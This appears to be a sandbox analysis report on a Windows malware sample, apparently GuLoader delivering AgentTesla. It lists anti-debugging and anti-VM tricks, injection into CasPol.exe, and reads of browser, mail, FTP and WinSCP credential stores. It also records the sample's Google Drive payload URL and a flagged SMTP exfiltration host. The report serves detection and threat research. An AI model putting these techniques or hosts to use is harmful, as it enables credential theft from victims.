Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe API call chain: ExitProcess graph end node
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137797013.0000000005019000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137797013.0000000005019000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137797013.0000000005019000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: CasPol.exe, 00000003.00000002.20370411559.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E
Source: CasPol.exe, 00000003.00000002.20371041773.0000000000E53000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137797013.0000000005019000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137797013.0000000005019000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 00000003.00000003.15865384687.0000000000E9C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17013199114.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20371570686.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15971915089.0000000000E9C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137436673.00000000034C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137436673.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20370411559.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137797013.0000000005019000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16135483008.000000000070E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exep
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137797013.0000000005019000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137797013.0000000005019000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16135483008.000000000070E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_71311BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_71311BFF
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033CCB37 rdtsc 1_2_033CCB37
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3F47 mov eax, dword ptr fs:[00000030h] 1_2_033D3F47
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3FB4 mov ebx, dword ptr fs:[00000030h] 1_2_033D3FB4
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D93AE mov eax, dword ptr fs:[00000030h] 1_2_033D93AE
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3FA0 mov ebx, dword ptr fs:[00000030h] 1_2_033D3FA0
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3FA0 mov eax, dword ptr fs:[00000030h] 1_2_033D3FA0
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D0388 mov eax, dword ptr fs:[00000030h] 1_2_033D0388
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D660E mov eax, dword ptr fs:[00000030h] 1_2_033D660E
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3E0A mov eax, dword ptr fs:[00000030h] 1_2_033D3E0A
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3E6A mov eax, dword ptr fs:[00000030h] 1_2_033D3E6A
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3EFF mov eax, dword ptr fs:[00000030h] 1_2_033D3EFF
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3DE4 mov eax, dword ptr fs:[00000030h] 1_2_033D3DE4
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D8DDC mov eax, dword ptr fs:[00000030h] 1_2_033D8DDC
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D4012 mov ebx, dword ptr fs:[00000030h] 1_2_033D4012
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D4081 mov ebx, dword ptr fs:[00000030h] 1_2_033D4081
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00ADB910 LdrInitializeThunk, 3_2_00ADB910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: BC0000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403640

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000003.00000002.20396460069.000000001D291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3292, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000003.00000002.20396460069.000000001D291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3292, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000003.00000002.20396460069.000000001D291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3292, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 612103 Sample: FRACCIONAMIENTO 17224039064... Startdate: 20/04/2022 Architecture: WINDOWS Score: 100 20 mail.ferdi.hu 2->20 22 googlehosted.l.googleusercontent.com 2->22 24 2 other IPs or domains 2->24 32 Found malware configuration 2->32 34 Multi AV Scanner detection for submitted file 2->34 36 Yara detected GuLoader 2->36 38 3 other signatures 2->38 8 FRACCIONAMIENTO 1722403906461L.exe 1 28 2->8         started        signatures3 process4 file5 18 C:\Users\user\AppData\Local\...\System.dll, PE32 8->18 dropped 40 Writes to foreign memory regions 8->40 42 Tries to detect Any.run 8->42 44 Hides threads from debuggers 8->44 12 CasPol.exe 11 8->12         started        signatures6 process7 dnsIp8 26 mail.ferdi.hu 185.51.191.23, 49786, 587 TARHELYHU Hungary 12->26 28 drive.google.com 142.250.186.174, 443, 49753, 49755 GOOGLEUS United States 12->28 30 googlehosted.l.googleusercontent.com 142.250.186.97, 443, 49785 GOOGLEUS United States 12->30 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->46 48 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->48 50 Tries to steal Mail credentials (via file / registry access) 12->50 52 5 other signatures 12->52 16 conhost.exe 12->16         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.186.174
 drive.google.com United States
15169 GOOGLEUS false
142.250.186.97
 googlehosted.l.googleusercontent.com United States
15169 GOOGLEUS false
185.51.191.23
 mail.ferdi.hu Hungary
43359 TARHELYHU true

Contacted Domains

Name IP Active
drive.google.com 142.250.186.174 true
googlehosted.l.googleusercontent.com 142.250.186.97 true
mail.ferdi.hu 185.51.191.23 true
doc-0c-74-docs.googleusercontent.com unknown unknown